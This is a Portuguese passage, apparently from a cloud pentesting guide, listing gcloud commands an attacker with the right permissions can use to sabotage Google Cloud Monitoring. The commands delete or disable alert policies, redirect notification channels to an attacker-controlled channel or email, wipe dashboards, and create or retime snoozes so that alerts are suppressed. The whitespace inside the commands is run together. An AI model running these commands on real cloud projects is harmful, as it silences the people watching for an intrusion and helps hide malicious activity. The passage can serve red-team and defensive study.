Para outras maneiras de interromper logs, confira:
monitoring.alertPolicies.delete
Excluir uma política de alerta:
gcloudalphamonitoringpoliciesdelete<policy>
monitoring.alertPolicies.update
Interromper uma política de alerta:
# Disable policygcloudalphamonitoringpoliciesupdate<alert-policy>--no-enabled# Remove all notification channelsgcloudalphamonitoringpoliciesupdate<alert-policy>--clear-notification-channels# Chnage notification channelsgcloudalphamonitoringpoliciesupdate<alert-policy>--set-notification-channels=ATTACKER_CONTROLLED_CHANNEL# Modify alert conditionsgcloudalphamonitoringpoliciesupdate<alert-policy>--policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"# or use --policy-from-file <policy-file>
monitoring.dashboards.update
Modifique um painel para interrompê-lo:
# Disrupt dashboardgcloudmonitoringdashboardsupdate<dashboard>--config='''displayName: New Dashboard with New Display Nameetag: 40d1040034db4e5a9dee931ec1b12c0dgridLayout:widgets:- text:content: Hello World'''
Impedir que as políticas gerem alertas criando um snoozer:
# Stop alerts by creating a snoozergcloudmonitoringsnoozescreate--display-name="Maintenance Week" \--criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \--start-time="2023-03-01T03:00:00.0-0500" \--end-time="2023-03-07T23:59:59.5-0500"
monitoring.snoozes.update
Atualize o tempo de um snoozer para evitar que alertas sejam criados quando o atacante estiver interessado:
# Modify the timing of a snoozegcloudmonitoringsnoozesupdate<snooze>--start-time=START_TIME--end-time=END_TIME# odify everything, including affected policiesgcloudmonitoringsnoozesupdate<snooze>--snooze-from-file=<file>
Atualize os rótulos de um canal para interrompê-lo:
# Delete or update labels, for example email channels have the email indicated heregcloudalphamonitoringchannelsupdateCHANNEL_ID--clear-channel-labelsgcloudalphamonitoringchannelsupdateCHANNEL_ID--update-channel-labels=email_address=attacker@example.com